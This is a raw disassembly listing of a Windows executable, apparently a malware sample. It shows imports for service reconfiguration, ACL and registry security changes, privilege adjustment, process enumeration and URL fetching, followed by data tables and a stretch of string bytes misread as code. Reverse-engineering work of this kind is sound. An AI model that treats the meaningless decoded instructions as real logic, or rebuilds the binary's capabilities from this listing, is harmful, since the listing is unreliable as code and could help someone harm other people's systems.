extrn __imp_log:dword ; DATA XREF: log�r
; char *__cdecl strtok(char *Str,const char *Delim)
extrn strtok:dword ; CODE XREF: sub_9A82C5+64�p
; sub_9A82C5+6F�p ...
; int __cdecl atoi(const char *Str)
extrn atoi:dword ; CODE XREF: sub_9A82C5+7F�p
; sub_9A82C5+D7�p
; DATA XREF: ...
; wchar_t *__cdecl wcscpy(wchar_t *Dest,const wchar_t *Source)
extrn wcscpy:dword ; CODE XREF: sub_9A7641+1BD�p
; sub_9A7641+2D2�p ...
; wchar_t *__cdecl wcscat(wchar_t *Dest,const wchar_t *Source)
extrn wcscat:dword ; CODE XREF: sub_9A7641+2EE�p
; sub_9A7B42+8B�p ...
; wchar_t *__cdecl wcsdup(const wchar_t *Str)
extrn _wcsdup:dword ; CODE XREF: sub_9A7374+1E3�p
; sub_9A7374+2AD�p
; DATA XREF: ...
; void *__cdecl malloc(size_t Size)
extrn malloc:dword ; CODE XREF: sub_9A6D9F+2E�p
; _CRT_INIT(x,x,x)+2E�p
; DATA XREF: ...
; void __cdecl free(void *Memory)
extrn free:dword ; CODE XREF: sub_9A6D9F+50�p
; sub_9A6E36+3A�p ...
; void *__cdecl memcpy(void *Dst,const void *Src,size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpy�r
; void *__cdecl memset(void *Dst,int Val,size_t Size)
extrn __imp_memset:dword ; DATA XREF: memset�r
; wchar_t *__cdecl wcsstr(const wchar_t *Str,const wchar_t *SubStr)
extrn wcsstr:dword ; CODE XREF: sub_9A52A3+25�p
; DATA XREF: sub_9A52A3+25�r
; int snwprintf(wchar_t *Dest,size_t Count,const wchar_t *Format,...)
extrn _snwprintf:dword ; CODE XREF: sub_9A5033+9D�p
; sub_9A6F7B+6B�p ...
; int __cdecl wcsncmp(const wchar_t *Str1,const wchar_t *Str2,size_t MaxCount)
extrn wcsncmp:dword ; CODE XREF: sub_9A4E45+C1�p
; DATA XREF: sub_9A4E45+C1�r
; wchar_t *__cdecl wcsncpy(wchar_t *Dest,const wchar_t *Source,size_t Count)
extrn wcsncpy:dword ; CODE XREF: sub_9A4358+BC�p
; sub_9A471B+164�p
; DATA XREF: ...
; int __cdecl wcsnicmp(const wchar_t *Str1,const wchar_t *Str2,size_t MaxCount)
extrn _wcsnicmp:dword ; CODE XREF: sub_9A4358+291�p
; DATA XREF: sub_9A4358+291�r
; wchar_t *__cdecl wcsncat(wchar_t *Dest,const wchar_t *Source,size_t Count)
extrn wcsncat:dword ; CODE XREF: sub_9A4207+43�p
; sub_9A4358+D6�p ...
; size_t __cdecl wcslen(const wchar_t *Str)
extrn wcslen:dword ; CODE XREF: sub_9A4157+17�p
; sub_9A4157+29�p ...
; int __cdecl wcsicmp(const wchar_t *Str1,const wchar_t *Str2)
extrn _wcsicmp:dword ; CODE XREF: sub_9A4157+31�p
; sub_9A7641+310�p
; DATA XREF: ...
; char *__cdecl strlwr(char *Str)
extrn _strlwr:dword ; CODE XREF: sub_9A4074+64�p
; DATA XREF: sub_9A4074+64�r
; char *__cdecl strstr(const char *Str,const char *SubStr)
extrn strstr:dword ; CODE XREF: sub_9A4074+8E�p
; DATA XREF: sub_9A4074+8E�r
; int __cdecl strnicmp(const char *Str1,const char *Str,size_t MaxCount)
extrn _strnicmp:dword ; CODE XREF: sub_9A3FB6+5C�p
; sub_9A82C5+A9�p
; DATA XREF: ...
; void __cdecl srand(unsigned int Seed)
extrn srand:dword ; CODE XREF: sub_9A3715+2B�p
; sub_9A394B+2D�p ...
; int __cdecl rand()
extrn rand:dword ; CODE XREF: sub_9A3715+31�p
; sub_9A387C+4D�p ...
; int snprintf(char *Dest,size_t Count,const char *Format,...)
extrn _snprintf:dword ; CODE XREF: sub_9A3715+68�p
; sub_9A3C63+CF�p ...
; char *__cdecl strrchr(const char *Str,int Ch)
extrn strrchr:dword ; CODE XREF: sub_9A3620+37�p
; sub_9A3FB6+C�p
; DATA XREF: ...
; char *__cdecl strncpy(char *Dest,const char *Source,size_t Count)
extrn strncpy:dword ; CODE XREF: sub_9A3620+54�p
; sub_9A3715+13D�p
; DATA XREF: ...
; size_t __cdecl strlen(const char *Str)
extrn __imp_strlen:dword ; DATA XREF: strlen�r
; int __cdecl stricmp(const char *Str1,const char *Str2)
extrn _stricmp:dword ; CODE XREF: sub_9A3620+81�p
; StartAddress+65�p ...
; char *__cdecl strncat(char *Dest,const char *Source,size_t Count)
extrn strncat:dword ; CODE XREF: sub_9A3620+92�p
; sub_9A387C+61�p
; DATA XREF: ...
;
; Imports from oleaut32.dll
;
; void __stdcall VariantInit(VARIANTARG *pvarg)
extrn VariantInit:dword ; CODE XREF: sub_9A49B2+5C�p
; sub_9A4E45+6D�p
; DATA XREF: ...
; void __stdcall SysFreeString(BSTR bstrString)
extrn SysFreeString:dword ; CODE XREF: sub_9A4D36+E8�p
; sub_9A4E45+108�p
; DATA XREF: ...
; UINT __stdcall SysStringLen(BSTR)
extrn SysStringLen:dword ; CODE XREF: sub_9A4D36+B3�p
; DATA XREF: sub_9A4D36+B3�r
; BSTR __stdcall SysAllocString(const OLECHAR *psz)
extrn SysAllocString:dword ; CODE XREF: sub_9A4D36+AA�p
; DATA XREF: sub_9A4D36+AA�r
; HRESULT __stdcall VariantClear(VARIANTARG *pvarg)
extrn VariantClear:dword ; CODE XREF: sub_9A49B2+195�p
; sub_9A4E45+11B�p
; DATA XREF: ...
;
; Imports from shell32.dll
;
; BOOL __stdcall SHGetSpecialFolderPathA(HWND hwnd,LPSTR pszPath,int csidl,BOOL fCreate)
extrn SHGetSpecialFolderPathA:dword ; CODE XREF: sub_9A387C+4A�p
; sub_9A387C+84�p
; DATA XREF: ...
;
; Imports from shlwapi.dll
;
; LSTATUS __stdcall SHDeleteValueA(HKEY hkey,LPCSTR pszSubKey,LPCSTR pszValue)
extrn SHDeleteValueA:dword ; CODE XREF: sub_9A394B+68�p
; sub_9A394B+74�p ...
; LPWSTR __stdcall StrStrIW(LPCWSTR lpFirst,LPCWSTR lpSrch)
extrn StrStrIW:dword ; CODE XREF: sub_9A66EF+95�p
; DATA XREF: sub_9A66EF+95�r
; LPSTR __stdcall StrStrIA(LPCSTR lpFirst,LPCSTR lpSrch)
extrn StrStrIA:dword ; CODE XREF: sub_9A3C63+165�p
; sub_9A3C63+1EB�p ...
; LSTATUS __stdcall SHDeleteKeyW(HKEY hkey,LPCWSTR pszSubKey)
extrn SHDeleteKeyW:dword ; CODE XREF: sub_9A4207+6D�p
; sub_9A7156+1A�p
; DATA XREF: ...
;
; Imports from user32.dll
;
; BOOL __stdcall EnumThreadWindows(DWORD dwThreadId,WNDENUMPROC lpfn,LPARAM lParam)
extrn EnumThreadWindows:dword ; CODE XREF: sub_9A4977+1E�p
; DATA XREF: sub_9A4977+1E�r
; HWND __stdcall GetDlgItem(HWND hDlg,int nIDDlgItem)
extrn GetDlgItem:dword ; CODE XREF: fn+6�p
; DATA XREF: fn+6�r
; BOOL __stdcall PostMessageA(HWND hWnd,UINT Msg,WPARAM wParam,LPARAM lParam)
extrn PostMessageA:dword ; CODE XREF: fn+1A�p
; DATA XREF: fn+1A�r
;
; Imports from wininet.dll
;
; BOOL __stdcall InternetGetConnectedState(LPDWORD lpdwFlags,DWORD dwReserved)
extrn InternetGetConnectedState:dword ; CODE XREF: StartAddress+128�p
; sub_9A60D7+51�p ...
; HINTERNET __stdcall InternetOpenA(LPCSTR lpszAgent,DWORD dwAccessType,LPCSTR lpszProxy,LPCSTR lpszProxyBypass,DWORD dwFlags)
extrn InternetOpenA:dword ; CODE XREF: sub_9A60D7+9D�p
; sub_9A81B2+70�p
; DATA XREF: ...
; HINTERNET __stdcall InternetOpenUrlA(HINTERNET hInternet,LPCSTR lpszUrl,LPCSTR lpszHeaders,DWORD dwHeadersLength,DWORD dwFlags,DWORD dwContext)
extrn InternetOpenUrlA:dword ; CODE XREF: sub_9A60D7+C3�p
; sub_9A81B2+87�p
; DATA XREF: ...
; BOOL __stdcall HttpQueryInfoA(HINTERNET hRequest,DWORD dwInfoLevel,LPVOID lpBuffer,LPDWORD lpdwBufferLength,LPDWORD lpdwIndex)
extrn HttpQueryInfoA:dword ; CODE XREF: sub_9A60D7+F9�p
; sub_9A81B2+B5�p ...
; BOOL __stdcall InternetReadFile(HINTERNET hFile,LPVOID lpBuffer,DWORD dwNumberOfBytesToRead,LPDWORD lpdwNumberOfBytesRead)
extrn InternetReadFile:dword ; CODE XREF: sub_9A60D7:loc_9A626E�p
; DATA XREF: sub_9A60D7+11C�r
; BOOL __stdcall InternetCloseHandle(HINTERNET hInternet)
extrn InternetCloseHandle:dword ; CODE XREF: sub_9A60D7+1A5�p
; sub_9A60D7+1AE�p ...
;
; Imports from ws2_32.dll
;
; struct hostent *__stdcall gethostbyname(const char *name)
extrn gethostbyname:dword ; CODE XREF: sub_9A857A+191�p
; DATA XREF: sub_9A857A+191�r
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_9A857A+23E�p
; DATA XREF: sub_9A857A+23E�r
; int __stdcall WSAStartup(WORD wVersionRequested,LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: StartAddress+AD�p
; DATA XREF: StartAddress+AD�r
; u_long __stdcall ntohl(u_long netlong)
extrn ntohl:dword ; CODE XREF: sub_9A4033+15�p
; DATA XREF: sub_9A4033+15�r
;
; Imports from ole32.dll
;
; HRESULT __stdcall CoInitializeEx(LPVOID pvReserved,DWORD dwCoInit)
extrn CoInitializeEx:dword ; CODE XREF: sub_9A4B7B+11�p
; sub_9A4C0F+14�p
; DATA XREF: ...
; HRESULT __stdcall CoCreateInstance(const IID *const rclsid,LPUNKNOWN pUnkOuter,DWORD dwClsContext,const IID *const riid,LPVOID *ppv)
extrn CoCreateInstance:dword ; CODE XREF: sub_9A4B7B+4E�p
; sub_9A4C0F+39�p ...
; void __stdcall CoUninitialize()
extrn CoUninitialize:dword ; CODE XREF: sub_9A4B7B+84�p
; DATA XREF: sub_9A4B7B+84�r ...
; HRESULT __stdcall CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc,LONG cAuthSvc,SOLE_AUTHENTICATION_SERVICE *asAuthSvc,void *pReserved1,DWORD dwAuthnLevel,DWORD dwImpLevel,void *pAuthList,DWORD dwCapabilities,void *pReserved3)
extrn CoInitializeSecurity:dword ; CODE XREF: sub_9A4B7B+31�p
; DATA XREF: sub_9A4B7B+31�r
;
; Imports from urlmon.dll
;
; HRESULT __stdcall ObtainUserAgentString(DWORD dwOption,LPSTR pszUAOut,DWORD *cbSize)
extrn __imp_ObtainUserAgentString:dword ; DATA XREF: ObtainUserAgentString�r
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 9A130Ch
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 1716h
; char Str2[]
Str2 db '(' ; DATA XREF: sub_9A3620+6D�o
db 17h, 2 dup(0)
dd 1736h
; char asc_9A1318[]
asc_9A1318 db 'H' ; DATA XREF: StartAddress+51�o
; sub_9A682F+4D�o
db 17h, 2 dup(0)
dd 175Eh
; char aT[]
aT db 't' ; DATA XREF: sub_9A36CC:loc_9A36F1�o
; sub_9A3C63+225�o
db 17h, 2 dup(0)
dd 178Ch, 17A4h, 17B8h
; const WCHAR Srch
Srch dd 17D0h, 17E0h, 17F4h, 180Ah, 1816h, 1836h, 1852h, 1862h
; DATA XREF: sub_9A36CC+2�o
dd 1872h, 1888h, 18A4h, 18B8h
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS KEYPAD "+" TO EXPAND]
align 4
dword_9A1364 dd 18D6h, 18EEh, 1906h, 1916h, 1928h, 1940h, 1952h, 1962h
; DATA XREF: .text:009B802C�o
dd 1976h, 1984h, 1996h, 19A6h, 19BCh, 19D2h, 19E8h, 19FEh
dword_9A13A4 dd 1A10h, 4D206569h, 1A36h, 1A42h ; DATA XREF: .text:Source�o
; char pszSubKey[]
pszSubKey db 'P' ; DATA XREF: sub_9A394B+5D�o
; sub_9A39CF+4F�o
db 1Ah, 2 dup(0)
dd 1A60h, 1A76h, 1A7Eh, 1A8Ch, 1A9Ch, 1AA8h, 1AB6h, 1AC4h
dd 1AD4h, 1AE2h, 1AF2h
; wchar_t dword_9A13E4
dword_9A13E4 dd 1B00h, 1B12h, 1B22h, 1B32h, 1B46h ; DATA XREF: sub_9A394B+18�o
; sub_9A7E0F+15B�o
; const WCHAR dword_9A13F8
dword_9A13F8 dd 1B5Ch, 1B78h, 1B86h, 1B98h, 1BB4h, 1BC0h, 1BCEh, 1BDCh
; DATA XREF: sub_9A39CF+6B�o
dd 1BEAh, 1C00h, 1C1Ch, 1C2Ah, 1C40h, 1C52h, 1C66h, 1C7Ch
dd 1C8Ch, 1CA2h, 1CB2h, 1CC2h, 1CD2h, 1CE0h
; const WCHAR dword_9A1450
dword_9A1450 dd 1CF4h, 1D06h, 1D1Ah, 1D2Eh, 1D3Ch, 1D4Ch, 1D5Eh, 1D6Eh
; DATA XREF: sub_9A39CF+60�o
dd 1D82h, 1D9Ah, 1DAAh, 1DC4h, 1DD8h, 1DE6h, 1DFCh, 1E0Ah
dd 1E16h, 1E26h, 1E3Ah, 1E48h, 1E58h, 1E68h, 1E76h, 1E84h
dd 1E9Ah, 1EB0h, 1EC2h, 1ED6h, 1EECh, 1EFEh, 1F0Ah, 1F1Ah
dd 1F2Eh, 1F3Ch, 1F54h, 1F64h, 1F7Eh, 1F8Ah, 1FA0h, 1FB0h
dd 39002Dh, 1FCCh, 1FDCh, 1FE8h, 1FF2h, 1FFCh, 2006h, 200Eh
dd 2014h, 201Ah, 2024h, 202Ch, 2036h, 2040h, 204Ah
dword_9A152C dd 2054h, 205Ch, 2066h, 2070h, 207Ah ; DATA XREF: sub_9A39CF+48�o
dword_9A1540 dd 2088h, 2092h ; DATA XREF: sub_9A39CF+3C�o
dword_9A1548 dd 209Ch, 20A8h ; DATA XREF: sub_9A39CF+30�o
dd 20B2h, 20BCh ; DATA XREF: sub_9A39CF+24�o
dd 20C8h, 20D2h, 20DCh ; DATA XREF: sub_9A39CF+18�o
dword_9A1564 dd 20E8h, 20F0h, 20F8h ; DATA XREF: sub_9A39CF+C�o
; const CHAR dword_9A1570
dword_9A1570 dd 2104h, 210Eh ; DATA XREF: sub_9A39CF+2�o
dword_9A1578 dd 2118h, 2122h, 212Eh, 63697672h, 2146h ; DATA XREF: sub_9A3C63:loc_9A3E5B�o
dword_9A158C dd 2154h, 2164h, 2174h ; DATA XREF: sub_9A3C63+1E3�o
; char aJ[]
aJ db '†!',0 ; DATA XREF: sub_9A3C63+1D5�o
; sub_9A3C63+211�o
align 4
aOst_v db 'ost.¢!',0
align 4
; char aServ[]
aServ db 'servÈ!',0 ; DATA XREF: sub_9A3C63+1B5�o
; sub_9A5C35:loc_9A5C38�o
align 4
db 'Ú!',0
align 10h
aC db 'æ!',0
align 4
dword_9A15B4 dd 21F2h, 32336C6Ch, 220Eh, 2222h ; DATA XREF: sub_9A3C63+147�o
; char a0[]
a0 db '0"',0 ; DATA XREF: sub_9A3C63+F6�o
align 4
aAlL db 'al\%L"',0
align 10h
db 'h"',0
align 4
; char Format[]
Format db 'x"',0 ; DATA XREF: sub_9A3C63+C1�o
align 4
aM db 'Œ"',0
align 4
aU db 'ž"',0
align 10h
; char Name[]
Name db '²"',0 ; DATA XREF: sub_9A3C63+3E�o
align 4
aBugp db 'bugPÔ"',0
align 4
aF db 'ä"',0
align 10h
dd 22F0h, 22FEh
dword_9A15F8 dd 806B000h ; DATA XREF: sub_9A4033:loc_9A4050�r
dword_9A15FC dd 2310h ; DATA XREF: sub_9A4033+25�r
dd 2322h, 2336h, 2348h, 0C2417BFh, 236Ch, 0C2A2BC7h, 130Ch
dd 2 dup(0)
dd 1708h, 1000h, 13ACh, 2 dup(0)
dd 1A28h, 10A0h, 14F4h, 2 dup(0)
dd 1FC0h, 11E8h, 1588h, 2 dup(0)
dd 2138h, 127Ch, 15A0h, 2 dup(0)
dd 2196h, 1294h, 15A8h, 2 dup(0)
dd 21BCh, 129Ch, 15BCh, 2 dup(0)
dd 2202h, 12B0h, 15CCh, 2 dup(0)
dd 2240h, 12C0h, 15E8h, 2 dup(0)
dd 22C8h, 12DCh, 15FCh, 2 dup(0)
dd 2306h, 12F0h, 1610h, 2 dup(0)
dd 2360h, 1304h, 5 dup(0)
db 61h ; a
db 64h, 76h, 61h
db 70h ; p
db 69h, 33h, 32h
db 2Eh ; .
db 64h, 2 dup(6Ch)
db 0
db 57h, 2 dup(0)
aRegcreatekey_0 db 'RegCreateKeyExW',0
db 0
align 2
aRegflushkey db 'RegFlushKey',0
align 4
aOpenscmanagerw db 'OpenSCManagerW',0
a? db '?',0
align 2
aEnumservicesst db 'EnumServicesStatusW',0
align 10h
aQueryserviceco db 'QueryServiceConfigW',0
db 0
align 2
aQueryservice_0 db 'QueryServiceConfig2W',0
a?_0 db '?',0
align 2
aGetnamedsecuri db 'GetNamedSecurityInfoW',0
db 0
align 2
aSetentriesinac db 'SetEntriesInAclW',0
a?_1 db '?',0
align 2
aSetnamedsecuri db 'SetNamedSecurityInfoW',0
db 0
align 2
aRegenumkeyexw db 'RegEnumKeyExW',0
db 0
align 2
aRegsetkeysecur db 'RegSetKeySecurity',0
db 0
align 2
aGettokeninform db 'GetTokenInformation',0
align 4
aEqualsid db 'EqualSid',0
db ']',0
align 4
aInitializesecu db 'InitializeSecurityDescriptor',0
aQ db 'Q',0
align 4
aAllocateandini db 'AllocateAndInitializeSid',0
db '}',0
align 4
aGetlengthsid db 'GetLengthSid',0
aM_0 db '¬',0
align 4
aInitializeacl db 'InitializeAcl',0
align 4
aAddaccessallow db 'AddAccessAllowedAce',0
db 0
align 2
aSetsecuritydes db 'SetSecurityDescriptorDacl',0
dd 65530000h, 6C694674h, 63655365h, 74697275h, 41004179h
dd 72460000h, 69536565h, 64h, 6E65704Fh, 636F7250h, 54737365h
dd 6E656B6Fh, 0D200h
aLookupprivileg db 'LookupPrivilegeValueA',0
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0
align 4
aOpenservicea db 'OpenServiceA',0
db 15h, 2 dup(0)
aControlservice db 'ControlService',0
aA db 'A',0
align 2
aChangeservicec db 'ChangeServiceConfigA',0
aA_0 db 'A',0
align 2
aRegsetvalueexw db 'RegSetValueExW',0
aU_0 db 'U',0
align 4
aRegopenkeyexw db 'RegOpenKeyExW',0
align 4
aRegqueryvalu_0 db 'RegQueryValueExW',0
db 'Ñ',0
align 4
aRegclosekey_0 db 'RegCloseKey',0
dd 704F0000h, 43536E65h, 616E614Dh, 41726567h, 8C00h, 6E65704Fh
dd 76726553h, 57656369h, 5500h
aCloseserviceha db 'CloseServiceHandle',0
aB db 'B',0
align 2
aQueryservicest db 'QueryServiceStatus',0
db 'Ð',0
align 4
aQueryservice_1 db 'QueryServiceConfigA',0
db 0
align 2
aCryptrelease_0 db 'CryptReleaseContext',0
align 10h
aCryptgenrand_0 db 'CryptGenRandom',0
aC_0 db 'C',0
align 2
aCryptacquire_0 db 'CryptAcquireContextA',0
aCkernel32_dll db 'Ckernel32.dll',0
db 2Bh, 5Eh, 2
aMovefilea db 'MoveFileA',0
aV db '‚',0
aDeletefilea_0 db 'DeleteFileA',0
db 0C9h ; É
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
db 43h
db 0B7h ; ·
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 33Fh
aSleep db 'Sleep',0
a2 db '2',0
aClosehandle_0 db 'CloseHandle',0
aM_1 db 'm',0
aCreatethread_0 db 'CreateThread',0
db 44h
dd 6F4C0253h, 69466B63h, 4400656Ch, 6547015Ch, 6C694674h
dd 7A695365h, 500065h, 61657243h, 69466574h, 41656Ch, 6547016Bh
dd 636F4C74h, 69546C61h, 4400656Dh, 654701DBh, 72655674h
dd 6E6F6973h, 3013000h, 45746553h, 726F7272h, 65646F4Dh
dd 0B77E00h, 74697845h, 636F7250h, 737365h, 6547010Ah
dd 6D6F4374h, 646E616Dh, 656E694Ch, 1690041h, 4C746547h
dd 45747361h, 726F7272h, 5DD000h, 61657243h, 754D6574h
dd 41786574h, 10E0000h, 43746547h, 75706D6Fh, 4E726574h
dd 41656D61h, 13D8B00h
aGetcurrentproc db 'GetCurrentProcessId',0
aK db 'Š',0
aDisablethreadl db 'DisableThreadLibraryCalls',0
db 5Fh ; _
db 2, 4Dh, 6Fh
aVefileexa db 'veFileExA',0
dw 285h
aProcess32first db 'Process32First',0
aJp db 'Jp',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
db 4Ah
dd 655202A4h, 69466461h, 4A00656Ch, 72430053h, 65746165h
dd 656C6946h, 2600057h, 65766F4Dh, 656C6946h, 577845h
dd 65440083h, 6574656Ch, 656C6946h, 37F0057h
aWidechartomult db 'WideCharToMultiByte',0
db '»',0
aExpandenvironm db 'ExpandEnvironmentStringsW',0
; ---------------------------------------------------------------------------
jmp short loc_9A1C1F
; ---------------------------------------------------------------------------
inc edi
loc_9A1C1F: ; CODE XREF: .text:009A1C1C�j
insb
outsd
bound esp, [ecx+6Ch]
inc ecx
insb
insb
outsd
arpl [eax], ax
add cl, gs:[ebp+75h]
insb
jz short loc_9A1C9A
inc edx
jns short loc_9A1CA8
db 65h
push esp
outsd
push edi
imul esp, [ebp+43h], 726168h
dec eax
add edx, [ebp+72h]
insd
imul ebp, [esi+61h], 68546574h
jb short near ptr loc_9A1CB3+1
popa
add fs:[ecx+eax+47h], dl
db 65h
jz short near ptr loc_9A1C9C+1
js short loc_9A1CC3
jz short loc_9A1C9F
outsd
db 64h, 65h
push esp
push 64616572h
add [edi], bh
add [edi+65h], eax
jz short loc_9A1CAF
jnz short loc_9A1CE0
jb short loc_9A1CD5
outsb
jz short near ptr loc_9A1CC6+1
push 64616572h
dec ecx
add fs:[ebx+654701DCh], al
jz short near ptr loc_9A1CD7+1
db 65h
jb short near ptr loc_9A1CF7+1
imul ebp, [edi+6Eh], 417845h
jnp short near ptr loc_9A1C90+1
push edi
popa
loc_9A1C90: ; CODE XREF: .text:009A1C8C�j
imul esi, [esi+eax*2+6Fh], 6E695372h
ins byte ptr es:[di], dx
loc_9A1C9A: ; CODE XREF: .text:009A1C2F�j
db 65h
dec edi
loc_9A1C9C: ; CODE XREF: .text:009A1C55�j
bound ebp, [edx+65h]
loc_9A1C9F: ; CODE XREF: .text:009A1C5A�j
arpl [eax+eax-41h], si
add dl, [ebx+65h]
jz short near ptr loc_9A1CF3+1
loc_9A1CA8: ; CODE XREF: .text:009A1C32�j
popa
jnb short near ptr loc_9A1D1E+1
inc ebp
jb short loc_9A1D20
outsd
loc_9A1CAF: ; CODE XREF: .text:009A1C6A�j
jb short $+2
icebp
pop esp
loc_9A1CB3: ; CODE XREF: .text:009A1C4D�j
add cl, [ebp+6Fh]
db 64h
jnz short loc_9A1D25
xor esi, gs:[edx]
dec esi
db 65h
js short loc_9A1D34
add ch, bh
pop edx
loc_9A1CC3: ; CODE XREF: .text:009A1C58�j
add cl, [ebp+6Fh]
loc_9A1CC6: ; CODE XREF: .text:009A1C71�j
db 64h
jnz short near ptr loc_9A1D34+1
xor esi, gs:[edx]
inc esi
imul esi, [edx+73h], 0B80074h
inc ebp
loc_9A1CD5: ; CODE XREF: .text:009A1C6E�j
js short near ptr loc_9A1D3F+1
loc_9A1CD7: ; CODE XREF: .text:009A1C80�j
jz short near ptr loc_9A1D2C+1
push 64616572h
add al, al
loc_9A1CE0: ; CODE XREF: .text:009A1C6C�j
add edx, cs:[ebx+65h]
jz short loc_9A1D3A
push 64616572h
push eax
jb short near ptr loc_9A1D56+1
outsd
jb short loc_9A1D5A
jz short loc_9A1D6C
loc_9A1CF3: ; CODE XREF: .text:009A1CA6�j
add [ecx+3], dh
push esi
loc_9A1CF7: ; CODE XREF: .text:009A1C82�j
imul esi, [edx+74h], 506C6175h
jb short near ptr loc_9A1D6C+3
jz short near ptr loc_9A1D65+2
arpl [eax+eax+3Fh], si
into
add [edi+65h], eax
jz short near ptr loc_9A1D5F+1
push 64616572h
push eax
jb short near ptr loc_9A1D7C+1
outsd
jb short loc_9A1D80
jz short near ptr loc_9A1D91+1
add [esi], bh
add [edi+65h], eax
loc_9A1D1E: ; CODE XREF: .text:009A1CA9�j
jz short loc_9A1D63
loc_9A1D20: ; CODE XREF: .text:009A1CAC�j
jnz short loc_9A1D94
jb short loc_9A1D89
outsb
loc_9A1D25: ; CODE XREF: .text:009A1CB6�j
jz short loc_9A1D7B
push 64616572h
loc_9A1D2C: ; CODE XREF: .text:loc_9A1CD7�j
add [ecx+6956036Eh], cl
jb short near ptr loc_9A1DA7+1
loc_9A1D34: ; CODE XREF: .text:009A1CBD�j
; .text:loc_9A1CC6�j
jnz short loc_9A1D97
insb
inc esi
jb short near ptr loc_9A1D9E+1
loc_9A1D3A: ; CODE XREF: .text:009A1CE4�j
add gs:[ebx+3], ch
push esi
loc_9A1D3F: ; CODE XREF: .text:loc_9A1CD5�j
imul esi, [edx+74h], 416C6175h
insb
insb
outsd
arpl [eax], ax
mov dword ptr [eax+74654701h], 636F7250h
inc ecx
loc_9A1D56: ; CODE XREF: .text:009A1CEC�j
db 64h, 64h
jb short near ptr loc_9A1DBE+1
loc_9A1D5A: ; CODE XREF: .text:009A1CEF�j
jnb short loc_9A1DCF
add [edx+42h], bh
loc_9A1D5F: ; CODE XREF: .text:009A1D0A�j
add cl, [edi+ebp*2+61h]
loc_9A1D63: ; CODE XREF: .text:loc_9A1D1E�j
db 64h
dec esp
loc_9A1D65: ; CODE XREF: .text:009A1D00�j
imul esp, [edx+72h], 41797261h
loc_9A1D6C: ; CODE XREF: .text:009A1CF1�j
; .text:009A1CFE�j
add [ebp+65470176h], bl
jz short near ptr loc_9A1DC0+1
outsd
db 64h
jnz short near ptr loc_9A1DDE+6
db 65h
dec eax
popa
loc_9A1D7B: ; CODE XREF: .text:loc_9A1D25�j
outsb
loc_9A1D7C: ; CODE XREF: .text:009A1D12�j
db 64h
insb
db 65h
inc ecx
loc_9A1D80: ; CODE XREF: .text:009A1D15�j
add [edi+654701DEh], bh
jz short loc_9A1DDE
outsd
loc_9A1D89: ; CODE XREF: .text:009A1D22�j
insb
jnz short near ptr loc_9A1DF7+2
db 65h
dec ecx
outsb
outsw
loc_9A1D91: ; CODE XREF: .text:009A1D17�j
jb short loc_9A1E00
popa
loc_9A1D94: ; CODE XREF: .text:loc_9A1D20�j
jz short near ptr loc_9A1DFD+2
outsd
loc_9A1D97: ; CODE XREF: .text:loc_9A1D34�j
outsb
inc ecx
add dl, dl
add [edi+65h], eax
loc_9A1D9E: ; CODE XREF: .text:009A1D38�j
jz short loc_9A1DF4
imul esp, [ebx+6Bh], 6E756F43h
loc_9A1DA7: ; CODE XREF: .text:009A1D32�j
jz short $+2
mov bl, 92h
add dl, [ecx+75h]
db 65h
jb short near ptr loc_9A1E29+1
push eax
db 65h
jb short near ptr loc_9A1E1A+1
outsd
jb short near ptr loc_9A1E21+4
popa
outsb
arpl [ebp+43h], sp
outsd
loc_9A1DBE: ; CODE XREF: .text:loc_9A1D56�j
jnz short near ptr loc_9A1E2C+2
loc_9A1DC0: ; CODE XREF: .text:009A1D72�j
jz short near ptr loc_9A1E21+6
jb short $+2
cmp al, 1
inc edi
db 65h
jz short loc_9A1E0D
jnz short near ptr loc_9A1E3D+1
jb short loc_9A1E33
outsb
loc_9A1DCF: ; CODE XREF: .text:loc_9A1D5A�j
jz short loc_9A1E21
jb short near ptr loc_9A1E41+1
arpl [ebp+73h], sp
jnb short $+2
or eax, [ebx]
push ebx
db 65h
jz short near ptr loc_9A1E21+3
loc_9A1DDE: ; CODE XREF: .text:009A1D86�j
; .text:009A1D75�j
imul ebp, [ebp+54h], 656D69h
push edi
add [edi+65h], eax
jz short near ptr loc_9A1E2C+6
imul ebp, [ebp+41h], 69727474h
loc_9A1DF4: ; CODE XREF: .text:loc_9A1D9E�j
bound esi, [ebp+74h]
loc_9A1DF7: ; CODE XREF: .text:009A1D8A�j
db 65h
jnb short near ptr loc_9A1E39+2
add ah, cl
pop esi
loc_9A1DFD: ; CODE XREF: .text:loc_9A1D94�j
add [edi+65h], eax
loc_9A1E00: ; CODE XREF: .text:loc_9A1D91�j
jz short loc_9A1E48
imul ebp, [ebp+54h], 656D69h
mov word ptr [ebx], es
push edi
loc_9A1E0D: ; CODE XREF: .text:009A1DC7�j
jb short near ptr loc_9A1E76+2
jz short loc_9A1E76
inc esi
imul ebp, [ebp+0], 655302FEh
loc_9A1E1A: ; CODE XREF: .text:009A1DB2�j
jz short near ptr loc_9A1E60+1
outsb
db 64h
dec edi
inc si
loc_9A1E21: ; CODE XREF: .text:loc_9A1DCF�j
; .text:009A1DDB�j ...
imul ebp, [ebp+0], 540347C0h
loc_9A1E29: ; CODE XREF: .text:009A1DAE�j
db 65h
jb short near ptr loc_9A1E98+1
loc_9A1E2C: ; CODE XREF: .text:loc_9A1DBE�j
; .text:009A1DEA�j
imul ebp, [esi+61h], 72506574h
loc_9A1E33: ; CODE XREF: .text:009A1DCC�j
outsd
arpl [ebp+73h], sp
jnb short $+2
loc_9A1E39: ; CODE XREF: .text:loc_9A1DF7�j
db 3Eh
jnz short near ptr loc_9A1E3D+1
dec edi
loc_9A1E3D: ; CODE XREF: .text:009A1DCA�j
; .text:loc_9A1E39�j
jo short near ptr loc_9A1E9E+6
outsb
push eax
loc_9A1E41: ; CODE XREF: .text:009A1DD1�j
jb short near ptr loc_9A1EB1+1
arpl [ebp+73h], sp
jnb short $+2
loc_9A1E48: ; CODE XREF: .text:loc_9A1E00�j
